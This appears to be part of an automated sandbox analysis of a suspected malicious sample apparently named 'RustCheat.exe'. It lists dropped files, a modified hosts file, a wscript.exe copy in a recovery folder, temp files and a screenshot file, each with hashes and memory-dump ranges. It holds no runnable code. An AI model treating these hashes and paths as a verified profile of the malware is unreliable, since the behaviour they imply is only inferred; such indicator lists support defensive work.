| SHA512 | efdf0c6228c3a8a7550804ac921dfefc5265eb2c9bbf4b8b00cedd427c0a5adf610586b844ff444bd717abff138affcbe49632ce984cbffc5fa8019b4ba6ec0f |
memory/2704-105-0x00000212D4FC0000-0x00000212D5036000-memory.dmp
memory/2704-107-0x00000212D4F40000-0x00000212D4F90000-memory.dmp
memory/2704-108-0x00000212BC4B0000-0x00000212BC4CE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 548dd08570d121a65e82abb7171cae1c |
| SHA1 | 1a1b5084b3a78f3acd0d811cc79dbcac121217ab |
| SHA256 | cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc |
| SHA512 | 37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b |
memory/2704-136-0x00000212D4E10000-0x00000212D4E1A000-memory.dmp
memory/2704-137-0x00000212D5040000-0x00000212D5052000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 36d03a272b43b1c16e5bce541906f649 |
| SHA1 | 66f0178c3182a09386738d60501411a14b4a3864 |
| SHA256 | 3fe1814466c786b9b14e3d1b9f9348434db490bc462b9e071f7bcaea5ef9e270 |
| SHA512 | d6c34935c1c22bda2ffd3550e54ca77bca92ab46829d3acc58c263fec94f8b6fa578105a80121c78e6d38ee51ec8f1bb8ae74ba7844a207499145308ec982a3a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3443467f6555d6b3524dd70e46cff8dd |
| SHA1 | 3e44ee1e05e988c725b7374baffb94436a14cb4e |
| SHA256 | ff5c1556068c1314c7a38718aeafbb4b362d0a5ee100ef1f236fd93306847baa |
| SHA512 | 1efead1fb284a707d7eef7a997e424ae4b63744a94c07a99c5a5d9e8775d55d9f7ed1191a94e046130afb2f308bc594d63f31398cef3ec204c24274ddaff4c19 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RustCheat.exe.log
| MD5 | 4c8fa14eeeeda6fe76a08d14e08bf756 |
| SHA1 | 30003b6798090ec74eb477bbed88e086f8552976 |
| SHA256 | 7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5 |
| SHA512 | 116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7f81c3ba861f1a722421cc95d105fecd |
| SHA1 | 1e6e9a67f190deb407c6fdbd224ce90b833490e0 |
| SHA256 | cebaa9795b2039a5784a0edcbf89cb298259a34c5aa7f89ba31344203ea37a81 |
| SHA512 | 1d44780b537d2797aaa636d913e2fb5dc00484d3bf9cbf42a67c7cd7988ff756326e9725b832df85c0c2fb1bc7c25f1ffa66e9b3ae5127868f38a88546a7555d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 96ff1ee586a153b4e7ce8661cabc0442 |
| SHA1 | 140d4ff1840cb40601489f3826954386af612136 |
| SHA256 | 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8 |
| SHA512 | 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b51dc9e5ec3c97f72b4ca9488bbb4462 |
| SHA1 | 5c1e8c0b728cd124edcacefb399bbd5e25b21bd3 |
| SHA256 | 976f9534aa2976c85c2455bdde786a3f55d63aefdd40942eba1223c4c93590db |
| SHA512 | 0e5aa6cf64c535aefb833e5757b68e1094c87424abe2615a7d7d26b1b31eff358d12e36e75ca57fd690a9919b776600bf4c5c0e5a5df55366ba62238bdf3f280 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eb1ad317bd25b55b2bbdce8a28a74a94 |
| SHA1 | 98a3978be4d10d62e7411946474579ee5bdc5ea6 |
| SHA256 | 9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98 |
| SHA512 | d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0 |
C:\Windows\System32\drivers\etc\hosts
| MD5 | 4028457913f9d08b06137643fe3e01bc |
| SHA1 | a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14 |
| SHA256 | 289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58 |
| SHA512 | c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 74a6b79d36b4aae8b027a218bc6e1af7 |
| SHA1 | 0350e46c1df6934903c4820a00b0bc4721779e5f |
| SHA256 | 60c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04 |
| SHA512 | 60e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 276798eeb29a49dc6e199768bc9c2e71 |
| SHA1 | 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b |
| SHA256 | cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc |
| SHA512 | 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c5838f9ee921b4c449391e6adc1763fa |
| SHA1 | d6690b109e2150a61a995fb40b2a3b6931053c86 |
| SHA256 | d6aad71bbd50b2660a31a0676eebf3f095ba1ac3a0800c4be9fd3dfded7a0fe7 |
| SHA512 | 7056bdb5e0eb479494e4f101e04a410e774c280aa33de61561f91d090fefe81bff38f1a9ffcd8a75ebe5e024dfed4867fd45f7932d53c5c84ec3499a99dd9dae |
memory/4792-341-0x00007FF863050000-0x00007FF863B11000-memory.dmp
memory/2800-367-0x0000000000410000-0x00000000005EE000-memory.dmp
memory/2800-369-0x0000000002780000-0x000000000278E000-memory.dmp
memory/2800-371-0x000000001B210000-0x000000001B22C000-memory.dmp
memory/2800-373-0x000000001B230000-0x000000001B248000-memory.dmp
memory/2800-375-0x000000001B1F0000-0x000000001B1F8000-memory.dmp
memory/2800-377-0x000000001B200000-0x000000001B20C000-memory.dmp
C:\Recovery\WindowsRE\wscript.exe
| MD5 | 8ccc428a5a6f6139dc191d332f3de08b |
| SHA1 | ae550a8fb67deeb1350020aa3fe8b0339db6bc71 |
| SHA256 | 801c5ad5a7853f375e15e1da7361e09b898d3c8770e291b8016eb207bba8c749 |
| SHA512 | 1479aac1b970722f47cbf77a01b213c84885af15b06e293bf9137863cbce44238832c5f4298dc56ca41847718f581d2bb434220824ffc5d54c08f1e55156e82e |
memory/2800-422-0x000000001CC40000-0x000000001CD55000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\uKHduJLxL6KTVQ1
| MD5 | 42c395b8db48b6ce3d34c301d1eba9d5 |
| SHA1 | b7cfa3de344814bec105391663c0df4a74310996 |
| SHA256 | 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d |
| SHA512 | 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845 |
C:\Users\Admin\AppData\Local\Temp\kjlpgQ4TCdNBpDW
| MD5 | 8f5942354d3809f865f9767eddf51314 |
| SHA1 | 20be11c0d42fc0cef53931ea9152b55082d1a11e |
| SHA256 | 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea |
| SHA512 | fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218 |
C:\Users\Admin\AppData\Local\Temp\Yd6DgKBvNCXyV6p
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Temp\6QxFtPFVBXAfpYj
| MD5 | 49693267e0adbcd119f9f5e02adf3a80 |
| SHA1 | 3ba3d7f89b8ad195ca82c92737e960e1f2b349df |
| SHA256 | d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f |
| SHA512 | b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2 |
C:\Users\Admin\AppData\Local\Temp\6sre2kRyaUJ5KEK\Display\Display.png
| MD5 | 4673dedb39902476a43db7db32840951 |
| SHA1 | 390c159f2be8bcb58c7860360b1b37c9dfc5732c |
| SHA256 | 57f14bd24019815bd4249a1cb02ef6717f309ce5711004e3622febdb4f31751e |
| SHA512 | a64b3beb97e4e5c08fd943d5b52d7d4759fba0881ff39433788ec932ad14c5c83d3cd5345c855df643655b6b939d99115ed76aee4908552157ba0629f6d84e3f |
memory/3088-699-0x0000000000280000-0x0000000000288000-memory.dmp